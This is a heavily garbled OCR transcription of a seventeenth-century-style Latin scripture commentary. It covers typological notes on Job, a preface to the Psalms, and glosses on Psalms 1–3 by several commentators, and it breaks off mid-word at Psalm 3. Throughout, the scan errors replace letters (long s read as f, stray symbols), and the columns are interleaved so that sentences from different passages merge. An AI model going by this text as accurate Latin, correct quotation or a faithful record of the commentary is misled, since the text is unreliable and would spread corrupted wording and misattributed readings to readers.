"Amaltbez,id cft.corna copizzilludentes ad fibulam Po£- | tatum, qui capram zfraaltbeara inxerunt nurricetm elle /o- 9i, é cuius proinde cernw Iupiter omnia bona hauferit, ita Olympiodorus. Qui & Tropologicé tres iftas trium filia- rum Iob proprictatcsapplicat,rrzus affernm ffatibus Prio mó,incipientium; Secundo, progtedientium; Tertió,per- ' fcttorum.S. Greg. allegorice, de ribus bemani generiz fla- € tibwsexponit : Primà,de primis parentibusn gratiacrea- tis;Secundó,de nobis omnibus per gratiam Chriftiredem- puis; Tertió,de refurrecturis ad gloriam fempiternam, quàd eleganuffimo eflct vultu , qua(itota ftibio depicta, quo facies & oculi przfertim inungi folent , ita (andtus Thomas, Olympiodoru; veró, Vatab!us & Mercerus ,di- cuat Iobea nomina filiabus indidiife in memoriam & mo- nimentum vtriufque fuz fortunz , aduer(e & profpetz, quali iam ex mifctiarum seaebris ope diuina redift adf Oronidis loco, brcuiter ex antedi&is contraham híc in vnum , quibus in rebusTob figura &typus fuerit Chrifti. Primó, Iobrex fuit Iduma : Chriftus rex celi & tete. Secundo , lob excidit om- nibus bonis & opibus fuis: Chriftus omnibus ctiam veftibus exutus , nuduspependit in cruce, Tercio, Iob filiis imul omnibus& filiabus vna hora priuatus fuit : Chriitum captum omnes cins Apoftoli defc- rueruut. Quarto , Iob omnes pene morborum & dolorum fpecies (aftinuit , vlcerofus à capite víque ad talos: Chrifto totum corpus flagris concifum , manus, pedcs clauis , capat fpinis confoffum fuir , & om- nia membra doloribus acerbiffimis exruciata. Quintà , Iob in animo fenfit ingentem moerorem , ta- | dium, fcrupulos , anxictates : Chriftus inhorto coepit pauere , tadere, triftari & moeftus effead mortem : víque. Sexto, Iob ab amicis quoquc , imó & à propriavxore, grauia probra fuftinuit , di&us impius , hy- poctita , tyrannus, leo, tigris, &c. N 1c v s apud Latinos , fed in quinque libros diffe&us apud Hebrzos, Dionyf. Ec- LL ; rhythmo fcu carmine ( inquit fandtus Dionyfius, Hieronymus & lfido- t rus) recenfet breuiter omnia gefta veteris Teftamenti, & pleraque ge- m.efa, e| AA. renda in nouo. Hinc multi Pfalmi verz funt Prophetiz : & vt talesva- ideis | ubinde argumenta tractant , nullo feruato ordine (cu temporum , fcu rerum. nc- & Frymol, Werten | & hos fequuti Emanucl Sa , Mariana , & quidam alij , volunt , folum Dauidem om- civi. | nium Pfalmorum fuiffe authorem. Sed in fine Pfalmi 71. definere dicuntur Pfalmi "P" Dauidis :& mox fübneduntur Pfalmi Afaphi Prophetz. Et 2. Paralipom, 39. v. 3o. przcipit Ezechias Leuitis , vt cantent Píalmos non modó Dauidis , fcd etiam Afa- phi. Vnde multo probabilius fan&us Hieronymus , Hilarius & Hebrzi cenfent , va- ; rios Pfalmos à variis Prophetis compofitos effe , iis ncmpe qui in titulis fubinde prz- notantur. verbi gratia, Moyfe , Zfapb, Ethan, Heman, Idithun, Salomone , & tribusfi- liis Core , féd plerofque à Dawide.. Quos deinde E(dras fimul omnes in vnum volu- men compegit. Scripti funt primüm Hebraicé, fed poftmodum ( vnà cum aliis libris | veteris Teftamenti ) à variis in Grzcum tranflati , & nominatim à fan&o Luciano | Martyre : cuius tranflationem in Latinum deinde conuerfam ( non veró tranflationem j Septuaginta Interpretum ,.vel fani Hieronymi , vt quidam opinantur ) à fan&o Hie- ! ronymo corre&am vfürpat- ha&enus Ecclefia Romana. Vide Bellarminum. : - i PSALMSVS I. e$YNOPSIS. [s [* St. inflar Prafationis in quinque libros P[slmerum : cj adhortatio ad. udium pietatis , (f impletio- nem legis diuine. In boc enim ftum «f. falieitatem viteprefentis C qui fecus faxint, Deo vindice perituros. eC, ; EATVs vir, qui non abiit in confilio impiorum , & in via peccatorum non flc- ; tit, & in cathedra peftilentiz non fedit: 2. * Sed in legc Dominivoluntas cius , & in lege cius meditabitur die ac nocte, 3. * Et crit tanquam lignum , quod plan- tatum eft fecus decurfus aquarum , quod fructum fuum dabit in temporc fuo : & | folium eius non dcfluet : & omnia quacumque facict profpcrabuntur. 4. Non fic impii , non fic. fed tanquam puluis , quem proiicit ventus à facie terrz. s, Ideó | non refurgent impij in iudicio : neque peccatores in concilio iuftorum. é. Quoniam nouit Do- minus viam iuftorum : & iter impiorum peribit. l À veróin pofteriori membro quo dicitur; c» o»nía qxe- ESTIV S. | eumque faciet , intellige quod quzcumque faciet home . | |iuftus , qui ligno fructifero fuit comparatus » quod illa Vei Y37 folium eius non deflaet 5. ci» omnia quecumque | | omnino profpcra crunt, & feelicem fortientur euentum 3 Rofaciet sprofperabuntur. Nota , prior pars coha- | | & finem. tet cum pracedentibus,& intelligitur ( esu:) fcilicet ligni. Durat enim adhuc comparatio ligni fructiferi cum homi- | V.$. 4deo non refurgent impij in qudicio , nsque peccato- ne iultoy, qui medirarsr jn lege Domini die ac noie. Àti res in concilio juflorm.Reóte Sixtina per futurum ( rejur- gent) legendum conftituunc.Ita enim habent Septuaginta BIBLIA ANNOT ATIONV M IN PSAL. I. 13l Interpretes,ex quibusi(ta noftra verfio immediate defum- | A | torum , quorum peltilens eftconfuetudo, cumre&tam fi- pta cit , cumczteros libros veteris ceftamenti habeamus trafiflatos ex Hebrao per D. Hietonym. Et quamuis Hic- ronymusctiam Plalmosex Hcbrzo verterit, tamen Eccle- fia illa eius verfione non vtitur , led verfione Septuaginta. Cuius non alia videturratio , quamquod Palmi tempore Hieronymiitafuerintfcequentati in Ecclefia , fiuein pre- cibus Monachorum , fiue aliàsin vfu Ecclefiaítico, vc in- terpr-tatio, qua tunc inomaium epatc manibus, & in oma nium ore,matari non pocucrit, ie hinc e(t,quod Pfal- mos adhuc legamus fecundum Sepcuaginta. "tod ad hunc verficulum attinet,non folum Septuagin- | ta,[cd & Hehrza | & corre&tiora Latina habent futurum | (refierzent.) Sed quzres,quomodo negacimptosin iudicio | telurre&uros,cum Euangelium teftetur Matth. 25. omncs tefürrectaros ,tam rlalos quam bonos ? Ad hoc dupliciter | tefpondetur. Vno modo, vt fubinrelligatur in iudicio (iv- flsrum)eo modo quo mox fibiungiturseque peccatores in concilio iufFerwm., Ex fcnfus (ic; Non accipient rudicium iu- ftorum. Alio modo, vt relurgerefit ftare & confiftere , & fenfus erit: IEmpij non ftabunc;neque conliltenr in iudicio, quia (ententia judicis eos damnabic.Ille aucem coniítit in iudicioqui caufam obtinet.quique innocens declaratur, & multo magis ;cui premiumà iudice decernitur. Sic accipi- tur ftare Lucz at. vbi dicitur : Orare , vr dignibabeamini flare ante filium ominis, Et Pül.139. Zn miferiis non («bfi- flent Vbi Hebrzisidem verbum eft,quodhocloco.O ten- ditucautem ibi, quomodo impij in miferiisnon fübfiftenr; nempe quia cadent (uper eoscarboncs, Kc. S A. Verf. iir, ideft, ambulauit,poffent & preterita hac L er prz(entia verti, («ilicet abit,ftac,(edec. Con- fi'io,quali pss ghun noaeít (ecutusconfilia /ja,id eft;in- ftituto,feu moribus.Srerit,id e(t,moratus cít. L Cathedra,id eft,confeffu,CChaldaice (ocietate. Peffilen- tiejd eft.cont: iof docteinz.Chald.& Hier.deriforum. | Sedit, fic P(a1.35.Non fedicum confilio vanitatis, &c.No- ta fignificari hic gradus , quibus ad (ammam impietatem peruenitur fcil cet eundo, (tando,fedendo, &c. alioqui di- cendum erat, Ncc fedit,nec ftetit.ncc abiit. | Va Foboastac id eit, affe&tus, delectatio. De ac notfe,id D eft, (a mper. ' V.3.Lignum id eftarbor. Ein; fcilicet ligni. Nen defluer, eftid oliuz & palmz Va Nn fic fcilicet erunt, | V. s. Hdeo. (cilicet quia diffimiles vita, & meritis, Refwr« gent d eft, confiftent , quafi dicat,non fe poterunt defen- derc.Hebraicé,ftabunt. /udicio;fcilicet extremo, vel iunge | cum iuftorum, l Nec peccatores. Hebraicà, & peccatotes, fed repetenda | negatio praecedens. Cencilio, id c(t, catu . Chaldaicé ,fo- | cictate. V.6.N oit id eft approbat. 7/iam, ideft , (tudia,vitz in- | ftieicam. Peribit, id cft, damnabiturà Deo,fcu ad nihilum | redgetur, — 754 | MENOCHIVYVYS. i Verf. p) Eater. Hebr. »wt& aftre , Pagninus, &alij vet- | I tunt, Beatitudines;quafi dicat,multismodis effe | beatumeum;quiquz (ubduntur,przftare (tudet.Alij,quos | fequitur Bcllarmrn. putant vocem illam e(fe indeclinabi- | | lem,& fignificare tum beatum,cum beatitudinem. | Non dir in cenfilio impiorum , noncit fecutuscon(ilia [ impiorum. - Impiorum.impiiproprié dicunturcontemptores Dei , & | rel gionis quiDeum non colunr, vel plurcs colunt.In He- | | brzocft core refelaim ,quzvox inquietos animo , & | confcientia fignificat » quafi inconftantes in fide & rcli- F j| gione. ? Invia peccatorum non f'etit. noninftititviam, perquam | j| peccatores, & Una Spare E cur tos (cutus eít. Eft re- i p'titio/fedaliis verbis,priorishemiftichij. | InCath:dra peffilentia. in confeiIu impiorum , & pecca« Tomus a. dem,& bonosmorescorrumpat, PefHlentia.in Hebr, e(t toro lezsmsderiforum, fed (en- , fasidem eft, nam nulla deterior eft peftilentia, quàm deri- dere legem Dei, 8& cos , qui iufté , & pie viuere ftudent, quanquam etiam y^ /ez ab Hebrzis,& yeudg pejilenzà Se- puuaginta interpretibus íceleratus quilibet generatim dici- tur , ex quo factum vt vocem Hebczam ali; aliter fint in- terpretati , nam Septuaginta sas? Peflilenem ,aut v mps- gara faperbum vecterunt; Aquila ;jversr deriforem;Sym- machus Palin; impojForemyquinta,& fexta editio absoojr dniquunyeu legem t ran(greduntem. V.2 45 lige Domini.Praceptis Domini. Voluntas eius. voluptas, dele&atio,ftudium,defiderium, | Bj negatium,amor,& propenfio. AM-dirabitur fe cxctcebit cogitatione fcilicet , voce, & opetc,hocenim Latina vox, Grzca etiam gaxmeu , & He- brza nin iegbe fignificant. V. 3-Lignum. arbor, Hebrzicnim arbores Cap bezim ligna appellaat. V. 4. Folium eius non deflner , (unt enim alique arbores frucbiferz , quarumfolia autumno decidunt , aliz quz co- marumhonorem (:mpetretinent, vt Pinus palma,olea, his iuftum comparat Dauid, V. s. Tanquam puluis, ficat gluma , vt vertit Pagninus, nam vox Hebraica y12 moz. proprie pd fignificat mi- nutiffimam, &leuiffimam quamfacil ventus raptat,qua- les funt aceres;glumz,& alizhuiafmodi quifquiliz. V.6. Ideo nonrefurgent impij im indicio sm[lorum , nonícíe efferent non erigent caput ,nonaudebunt prod recoram Dcitrbunali Vel,non confiftent cum iuftis,inter iuftoslo» cum nonhabebunt. Quod autem fpectat ad particulamil- laciuam, /deo, varie ca à diucrfisaccipitur, Nam vel deduci- | rex "ron hoc modo:Quia impi) fimiles funt pul- | ueri, ideà ftatenon poterunt in iudicio : Vel,nectirurcum. | fequenzibus ,hoc fcn(u : Merità non re(urgent, &c. quia viam iuftorumnouit Dominus , nonautem impiorum, fed potiusillam odit, & execratur. 4n concilio. Conciliumhic catum , & Congregationem fignificat , & per c. (ribi debet, vt Hebrzo m badatb telpondeat , Verfaprimo fcribendum per s. e(t enim alia vox nyy fecu ctl Gracé fitcadem vox, licec ambigua [] VAN. V.6. Nouit Dominu: viam inferum, Probat Dominus vias iuftorum, hoc eft,mores, & agendi,viuendique ratio- nem,quam fequuntur, bene ctiamfortunat, & munerarur, Ixalicé dicimus, Ricenoftere. Peribir infeelicem, & infauftum exitum fortietur. TIRIN V S. | Verf. Eré beurus eft, non qui opibus,delitiis, honori- LY / bus floret, fed gui 5n confilio impiorum non abiit, ideít, quinon obíequitur malisconf(iliis impiorum homi- num: Qj ys vie peccatorum non [fetir (eu rationi & confüc- ! tudini viuendi ipforum non inhztet , neque fedi in Cathe- j dra peftilentie id eft,non docuitalios Bla impia & petti- | lentia corum dogmata. Septuaginta pro pefPilentie verte» tunt , euo , id eft» peltium. In Hebtzo cít /erzim jid eft, deriforum , feuqui diuina. & humanaiura rident , fuaque 1mpia ptincipia vulgo inftillant, atqueita peítes (ant mun- di.Dcfignantur veró partimarhei;partim hzretici, ita n- &us Athanafius, Origenes, Bafilius & Theodoretusin Ca- tena Grzcorum Danielis Barbari.Et notant hic S, Ambto- fius & S. Augultinus triplicem gradationem impietatis: Primaminvoculis , confí!rj , vi » cathedr :Secundamin nominibus, smpiorum, peccatorum ( exhabitu) & peffHilen- tium.Tertiam in verbis abiit, obíequendo:/feriz inharen- j dojeditAliosdocendo. ] V.5- Nonrefurgent impij ( Hebraice ,non ffabunt; Chal. | daice , non cenfiffent ) quia nempe cadent causi, & damna- buntur, putà is fudicio iufforum, & in concilio feu coetu, co- rumdem , quafi dicat. Quando coram diuino tribunali m- pij vnà cum iuftiscongregabuntur , & iudicabuntur ; tunc impijnon ftabunt amplius,vt olim erecto capite;nec con- M Lu MM MÀ M ——— —— M —À M————————————————— — 23? BIBLIA ANNOTATIONVM RM M fiftent autre(idebunt primo leco,fed prz pudore & metu | — V. .Quia nowit Dominus notitia approbationis, id eft, vix pedibusinüiftent, vultuin terram deiecto:& caula ex probat ,amat, profperat, & przmio compeníat, viam, id toto cadent, palàm damanabuntur, & (umina cum ignomi- ct , viuendi modum, conatus & actiones, iwfferum. Odit | nia proculàcosta iuftorum arcebuntur, ita fan&us Augus t contra & perdet jrer , idcft , actiones & conatus , m- ftinus. | pierum, ita Theodoretus & Dama(cenus. | PSALMVS II | SYNOPSIS. cipes terrarum ; nam Deus Pater, qui Chriflum. con[lituit Regem vniurforum rcgnum ipfius modis om- xibus tonféruabit, Vbi cum[anifo Hieronymo Nota , P(slmriflam (vt. folent Propheta ) faepius in eodem Pfal- mo mutare perfonas , cr in morem Dielogi[mi varios inducere. loquentes, iam Deum , iam eipfum y sam bofhes ! fos : mec tamen femper perfonas bas exprimere aut [ecernere fed ex adiuntis fecernendas Leltori relinquere. | b. deserens de Incarnatione , regia pote[late jm imperio Chrifli ,cni. fruflra f£. opponent. Reges cj Prin- 44, Varefremuerunt Gentes,& populi meditati funt inania? 2. Aftiterunt Reges ter- QU rz , & Principes conuencrunt invnum , aduerfus Dominum,& aduerfus Chriftum 7 cius, ^3. Dirumpamus vincula eorum : & proiiciamus à nobis iugum ipforum. 4. Quihabitat in. ccelis irridebit cos: & Dominus fubfannabit cos. $. Tunclo- ? quetur ad cos in ira fua, & in furore fuu conturbabit eos, 6. Ego autem confti- tutus fum Rcx ab co fuper Sion montem fan&um cius, przdicans preceptum cius. 7. * Dominus dixit ad mc : Filius mcus-es tu , cgo hodie genuite. 8, Poftula à mc , & dabo 3 eise tibi Gentes heredittaem tuam , & poffeffionem tuam terminos terre. 9. * Reges cos in virga fer- " rea,& tanquam'vasfiguliconfringeseos. 1o. Et nuncreges intelligite : erudimini qui iudicatis ter- ram. r1. Setuite Domino in timore:& exultate ci cum tremore. 12. Apprchendite difciplinam,ne- quando irafcatur Dominus , & percatis de via iufta, 153. Cüm cxarfcrit in breui ira cius , bcati omnes, qui confidunt in co. ESTIVS. B $ A. . 11. De confilio F'udeorum , Co Gentium eontra Chriftum. Vef. Vare fremuerum gentes , de populi medirais funt T 3nania ? Aiterut vegeterre , crc. Huiusloci clariffimainterpretatio eft AGt. 4. vbi qurgentes,q ipo- palisqui reges & principesintelliganturexplicatum habe- mus.Quo eciamloce diferté Dauidi authori tribuitur hic Píalmus. V. 7. Ego bodie genui tc Varie iftud exponitur. Autenim ad zternam Lipi ex patte refertur, vt refert Apo ftolus ad Hebr. 1. Vide ibidem noflra. Autad refurrectio- nem , qua natus eftin viram immortalem,vt A&orum 13. Aut ad temporalem ex matre natiuiratern, quomodo acci- pitFulgentus refp.3.contra Ariahos. —— V.az. à mne id di[ciplinamynequando yrafcatur Do- minu, Quodfecundum Septuaginta hic legitur, Apprehen- dite difcspiinam.D.Hieron.ex Hebrzo vertit, zfdorate pn- re. Alij rurfum ex Hebrzo vertunt , Ofrulamsni filimm, am verfionem etiam D. Hieronymus apptobat. Et re- ucra vox Hebrza ( ofeular:) (ignificat:altera antem voxfre- quenter filium fignificat, licec aliquando ctiam fignificec ( pari) Omnes aatem intecprerationes codem concutrunt, , videlicet , vtapertiffimam de Chrifto prophetiam conti- neant.E: fenfus eft :Ofculamini filium;amplectimini fium toto mentis affectu; (ufcipite eum,fübiicite vos ei, & ado- ratecum , & difciplinam eius apprchendite. Phrafisenim indefumpta eft.quod Iudzi,& omnesPalzítini oculo ma- nuum alicuius , fignificare folent fecifubic&tos , & eum agnofcere pro Domino, & principe. Vnde phrafi illa non tantum amor;cuius ofculum apud omnes nationcs eft fym- bolum , verum etiam obedientia & fübictio fignificatur. Vide Hieronym. contra Ruffinum excufantem (c de fua verfionc. Refpicitur autem ad illud fuperius : Domtiner di-| — | alij vertunt. ofcalamim filium. Hict.adorate pure. xit ad me,Filtui meus es tu cc, qua(i dicat. Quoniam er- Nequands, Hiecon. neforté, Pereati; de v1a, Chaldaicé, go Deus me filium fuum pronunciat,meque conltituit re- amittatis viam, /u/fe, idcQ, recta, quamquam non cft He- grmume eius filium ofculamini, adorate, & colite tanquam | | | braicd; tec Chald. Fegem veftrum. E irren id cfl, cito. Hier. poft paulura. Eojfcilicet | ifo. l | Ver L3 Remuerunt. id c(t , tumultuatz funt. gene: , id | 1 elt, nationes exter e fcilicet Romani. Pepali cili cetIudzi, : Vas Ab fliterunt fcilicet con(ilij caprandi caufa, Reges fci- licet Herodes, & Pilatus. Principe: fcilicet Annas, & Cai- phas. in vnumjid eft,(imul. V. 3. Dirumpamus , Hieronym, Epiltol. 117. putat id diciex perfona Domini. Alijexper(ona impiorum acci- piunt. F'incnla.id eftleges quibus fubditi velat ligantur. Eeruns d e(t,Domini, & Chrifti eius-Zurum,quafi dicat, non pareamus.Hier.laqueos,Chald.funes. V. a. PIrridebit id et,ridendosexponet.Subfamnabir,re- petitio przcedentis. V. g. Tunc, fcrlicet cüm irridebit, (n jr, id eft iratus, Zn forore, cepetitio. V.6. Ego.voxDauid & Chrifli, 55m id eft, Kcclefiam, cuius figura Sion, Mentem ;ícilicet excellentia, & firmita- te. Praceptum;pto,przceptajfcilicet Euapgelica. " V.7.Gemu te. Ícdicet ex virgine,vel ab zterno»velin re- C fürredione, Vide A&15.& Col.r, V.8. Poffula quaíi dicat,fi poftules. Terminos, pro,v(que ad terminos. V. o, Ferrta. id eft, inflexibili ad iniuftitiam, Confringes, quafi dicat poteris conterere;ícilicet non obedientes, V.10. /ntelligiteid eft fapite feuceüpifcite. V.ri- Exxltate es. Chald. orate, Va. e^fpprebendite. (cilicet fammo ftudio, & firmiter, id enim fignificat verbum Grzcum Ez. Di/ciplinam, (*.") (uo) C. MEAN M (9 (4*8) em IN PSAÀLMVM MENOCHIV S. Verf, 2 Reomuevint , aliqui Hebraum qe ragefew vet- r tunt , congregabunt fe , alij , twmuituate [um gentes, Gentes. vox Hebrza tna goimpaffim in facrisliteris ac- cipitur proethnicis [iue gentilibus. Popuis. pet populos intelliguntur Hebrzi , vt patet ex At cap.4.num. 27. vbi legimus:Cenuenernnt vere in ciii" tate iffa aduerfum /anibum puerum tuum efum , quem yi- xifli, Herodes, ce Pontius Pilatuscum gentiéos , e populu Jfrael, facere que manus tud, cre. Inania, inancsconatus adhibuerunt. V.a. A fliterunt jn vnum coierunt;confpirarunt. Reges , c. Principes, Hérodes, & Pilatus, fic chim ex- plicare videtur locus ex Apeftolorum ais proximé ci- tatus. "dduer us Doviaum, adueríus ipfam Deum , quiRegem conitituit Chriftum, Crijlum eiui, Iefam Chriftum , ab ipfo vn&um in Regem. V. 3. Dirumpamw:. funt vocesgentium, & populorum Chrifti iugum (übire recufantium, Vincula cvm, mpiis diuina pracepta vincula videntur & compedes,laqueus & iugum uriffimum,cum tamen fit iugum Íaaue, X onusleue. Vo Qibabitat incalis, Deus. Irvidebit eos , fignificatur fecuritas quedam Dci , ni- hil timentis ne fotte abimpiis confilij fui decretum irri- tetur. V.f.Tnc.cum Deo aduetfabuntur,& cenabuntur illius jugum excutere. Loquet«v adeo: inira f44.quid dicturus fit Chriftus, ha- bes ver(iculo proximé fequenti, Vel etiam loquetur non vetbis ,fed verberibus, graui ffimis peenisillos admonens. Dici etiam po:eft tunc adeoslocutus,cum pet Apoftolos alioíque fanctos diuino fpiricu inftinctos, illos acritet vo- luit obiurgari:fic S. Stepbanus dicebat, Dra cermice, dr in- circunc:fi corde , vo: femper fbivitui fanito veftitiflis , cic. Ac. 7. "Cospurbabit.xerebit,vt vertit Pagninus, V. 6. Ego atem , particula , autem , obiurgationiad- iunctam emphafim habet , idem enim eft ac fi dicerc- tur: Vos mihi aduerfamini, & tamen egoconftitutus fum Rex,&c "fb ««,3 Deo. Super Sion fuper Ecclefiam,quz cft ciuitas in monte po- fita, & cuiustypusfuit Ierufalem,cuius pars przcipua , & magisà Dco d le&ta , & fan&ificataeft Sion , iuxca illud: Dilsigit Dominus portas Sion , [uper omniatabernacula [4- cob. Pal.86.2. Pradicans praceptum eiut N oxHebrza pui cbog,Decrc- tum fiue flatutum lignificat:nimirum decretum, que Deus ftatuit Chrifti regnum in totum orbem propagandum, Hocautem decretum Chriftus Dominus fua przdicatione hominibus patefecit. V3. Geni te. vriplexefthuius loci fen(us literalis, vt pe ex aliis prz(ertim fcripzurz locis , ad literam enim mo elt de ztetna. Vcrbi generatione , cx diuo Pau. lo ad Hebr. t. De Natiuitate Chrifti fecundüm carnem, ex fanctorum Patrum interpretatione , & accommoda- tionc Ecclefiz. Tandem de rcfurredtione corporis Chafti exfepulchro quz cft quzdam regeneratio, x eodem diuo Paulo A&.15. V. 8.Poffula & me, &c.Hac verba humanz Chrifti natu- rz tancum k ^a poffunt : m hac enim orauit , & accepit gentes hzreditatem , in diuina enim zqualis cft cum Patre maieftaris. Patrisautem propriumeft hzreditatem filiisre- linquere ; ideoque aptà, poftquam illum filium appellauit, hzrcditatismentionem induxit, Hereditatem tuam ln hereditatem tuam, vt fcilicet fint offeffio tua, vt ftatim fubditur. Nomen etim harediratis incripturis accipitur pro quacunque re, qua poffidetur vt propriactiam(i proprie non (it relictaà patre defuncto, & 115 I I. ideó ram populus Dei dicitur hzrediras Dei, quam ipíe Deushzreditas populi fui. Terminosterre omnes enim pezcipuas orbis partes ctiam longe diffitas peraafit. Euangelif przdicatio , & Eccleíia in iis fundataeft. V.9. Reges eor. Septuaginta habent. eayaxrés paftoraliter Ioannes Ápoc.c.2.& cap. 19. 18 virga ferrea , (cepto , fiue paftorali bacu- lo ferreo, Significatur hac mataphora non folum vindi- &s fcelerum , & (ontmmpunitio , fed etiam regimen to- 1tus Eccleíiz iuftum , re&um, ad iuftitiam infexibile , & potens. " Tanquam v figuli , quod fcilicet comminutum re- fici non poteft. [ta iis accidit » qui ad zterna damnan- tut fapplicia. Poteft etiam intelligi de. vafis nondum fornace exco&tis , qua iterum aqua macerari poffünr, (ubigi , & formari. Hoc Deus in iisfacit , in quibus con- fringitinfidelitatem, & ex vafis contumeliz, vaía honori: format.. v. 10.N une.tempeftiut mature, dum pecnitentizlocus, S& tempusconccditur, : Jntellzite. Sapite, prudenter agite,tefipifcite,& huncre- gem agnofcite,. Erudinini.eft eiufdem hemiftichii vfitatarepetitio,qua- re idem eft rudimini ; quod , inrel'igire , quemadmodum; Qus Tudicat is terram idem eft quod; Reges. V. 1. T'imore, in Hebrzoe(t nw srab , quz vox pieta- tem,feu amorem filialem fignificat. : Exultare.vcamantes filijfaciunt,Itaque cft eiufdem fen- fus repetitio in fecunda parte verüculi , fed alis verbis, ac | fi di&tumfuiffet : (ecuite,& timece cum amore,exultate,& amatecum timore. V. viens dift iplinam, Hunclocum ex He- brzo alij reddunt, Oftulamisi filinm , alij, Adorate fi- | lium »alij, Afdorate puré , pollet etiam reddi , Comple- | Uimini puritatem. » lenius ct : Adorate filium , fcilicec | Chriftum Domigum ; :n fübicctionis ; & obedientiz fi- ' gaum ; & illius leges admittite, quod ,dem eftatque ,ap- | prebendite difciplsnam. Non dixit accipite, vel admittite | diíciplinam , fed apprehendite, idet ; compledimini , & ] magno affc&u fufcipite. Nouum regem olculo venerari vetus mos erat, Sic Samuel Saulem in regem inuactum ofculatur primi Regum decimo; ic quod Genefisquadra- geíimo primo legimus : dori; rui imperinm cunis popu- lus obedsetjin Hebrzo e(t: 2fdos tuum cuncius populus ojcu- | labitur.. De "viaiuffa de via iuftitiz, & à bonorum remuncratio- | ne,& felicitate xtetna excidatis. V. 13.75 breui, fignificat cito venturum dicm illumter- ribilem , quo Dominus mortales omnes iudicaturus eft, & pro meritis bona, aut mala zternaeltredditurus; nam | milleanni inconípectu Domini , ficut dies heíterna qua prateriit, Qui confidunt in eo. qui merito fidere poffunt , quia Dei amiciciam, & feruitutem [ande coluerunt. TIRINVS Verf. Icunt tyranni ; irs ete vincula eiram.] 3$ id eft , leges Dei & CI rifti , quibus nostam- quam funibus vincire volunt, Sed fruftra id impij co- nantur: V. 6. Egochim , inquit Chriftus, przcepto zterni Patris mei , conf iturus fnm vex [uper Sion. id eft , (uper vniuer- famEcclefiam Dei , cuiust ypus , fundamentum & otigo fuitin Siem arce Dauidis,& templo Ierofolymitano.V oca- tur veró mons propter eminentiam & firmitatem,inquit S, Auguítinus, Predicanr green) Hebraicé & Chaldaice , pr«- dicabo iam » euexponam vobis hoc Patris mei preceptum, nempc quo E V. 7. Dixit dme, Filius meus rtu.) Nam coipfo qu» megenuit naturalem filium (uum, conftituit me heredem Tomus 2. ————— MM map —————————— quoque faum vniuerfalem, & confzquenter dominum & V uj 07 i teges quam le&tionem,& interpretationemfequicur diuus | —— —————— 1234. BIBLIA A NNOTATIONVM em czli & terrz.. Genuic vetà me Primó » bodie , id »'hoc momento zternitauis (. inquit (an&us Paulus & (an&us Auguftinus) id e(t , femper » ab omni aternita- te, & adhuc continuo omni inftanti (nam quod ab ater- noelt, (emper & continuo eft ) gignit mz fecundüm diuii- nam naturam meam , camquam Verbum fuum & filium naturalem. Secundó , bod'e , ideft , hoc mez incarnatio- | nis die , genuit me fecunddm naturam meam humanam, ! eteando illam, & natura diuinzhypoflaticé vniendo : fic | enim denouo produxit me hominem Deum , & filium fuum naturalem , ita alibi (anctus Paulus , & Origenes, Cyrillus , Theodorezus, Euth ymius. Tertio , bodie, id eft, | hoc die refarreétionis mez , fecundüm carnem regencra- | uicme , dan mihi corpusimpalfioile & aliis gloriofisdo- | tibusornatum , itaidem (anctus Paulus Actorum 15. ver- fu 33. fanctus Ambrofius , Hilarius , Chryfoftomus , & : alij. Potfunt enim vnius & eiu(dem loci S. Scripturz vt |propriz fignificationes, ita & fenfus litterales plures effe, quos Spiritus (anótus etiam immediate fimul intenderir ad plura imul myfteria defignanda , ita S. Auguftinus, & Dolores paffim. ; V. 8. Poflula à ne.) Decrctum enim Dei & przdeftina- tio precesnoftrasnon excludit,inquit Mariana. Scd hic ad [mcricumrefpicividetur, quaft dicat. Ad tres citulos,tripli- (€i generatione tibi pattos » volo etiam quattus accedat, | nempe meriti, quo per variosactus & paffiones,quaf iu- ire poftules & exigasá me quod optas;. | £t dabotibiquidquid optaueris , eriam Gente: in barc- ! t t | ditatem tuamjd eft, vt regnumtibi hazteditarium, ícutaa [: M eb, 1. vs; | Cf IHeb.fg. v.g. 8$ Mug li foffe. Chri ame € a7- * en SYN PSALMVS A Ecclefia; non ampliuscon(tet folis Iudz is, vt con(tat $y- nagoga , fed fit plane Carbolscum (cu vaiuet(ale , comple- Gens emnes nationes & populos, & quidam víque ad ter- mines terra.) nempe quotquot per fidem & obedientiam fe cibiramquam tegi (uo (abdere volent.ita Eufebius,Dy- dimus , Tacodotetus & alij. Vnde conftat hunc P(almum ad literamnon de Dauide, vt volunt Rabbini; & Salianus (nam Dauid: numquam obtigit cam amplum imperium) fed de Meffia Douidis filio exponendum cffe,ita SS. Patres & DoGores. V. 9. Regerfea gubernabis, eor qui tibi rebelles & ino- bedientes fuerint ( de quibusinitio Püaltni) in virga fer- rea.) id eft íceprroforti & duro,quotyranaos omhesi- cet potentifimos , quafi vafa figlina confringar,& conte- raspartim inhac vita, partimin fatura,ita fan&us Hiero- nymus, V2. Mpprebendite difciplinam. id eft, in(tru&ionem, do&tinam & dire&ionem Meffiz,illique fubiacete & obe- dite. Hebraice , adorate pré, vcl melius, ofeulamini filium B | ^3 ( ar enim tam filium , quàm parum feu puritatem fi- | gnificat : Filium, inquam, Dei, vt dixerat verfu 17. id eft, | AMeffiem inquit Aben Efra , rcuerenter excipite;adorate, colite,vt datum vobis czlitusregem,vofque veltraque om- nia illifubiicite : nam efculesfeu manuum , (zu pedum, fignum eft adorationis, fübie&ionis & obedientiz , hoc aucem fit , «pprebendendo difcip'inam;id cít,inlttuct:onem | & dodtrinam Euangelii Cirio iita Achanafius, Vidc dida | inProlegomenis,& Iob 3t. veríu 27. | em P] (e "Proleg. de iIElior Hebr. jm. ue III. G* OPSIS. se Auid fugiens à facie Abfalom fllij fui , 2. Regum 1. v. I4. excitat in fe fem diuini auxilj nuaquam fibi defuturi. Allcgorice , conuenit Chriflo patienti , cum eumdem torrentem Cedron , quim olim Dantd , tran(grederetur ; Tropologice ,cuiuis iu[lo diabolum C perfecutores fugienti. ita Atbanafius, r. Pfíalmus Dauid , cüm fugeret à facie Abfalom filij fui. ( 2. Regum t5. 14. Omine quid multiplicati funt qui tribulant me? multi infargunt. aduerfum me, 3. Multi dicunt animz mez : Non cft falus ipti in Deo cius, 4. Tu autem Dominc füfceptor meus cs, gloria & exaltaus caput meum, 5. Voce mca ad Dominum clamaui : & cxaudiuit mc de monte fan&to fuo. 6... Ego dormiui, & foporatus fum: & exurrexi , quia Dominus fufcepit me. 7. Non timcbomil- lia populi circumdantis me : exurge Domine , faluum me fac Dcus meus, 8. Quoniam tu percuffifti omnes aducrfantes mihi fine caufa: dentes peccato- Co ESTIV S. Nihil annotatur ab Efio. $ A ut. De Chrifti Paffione ci Refurreiliono, Verf )Salmus. id 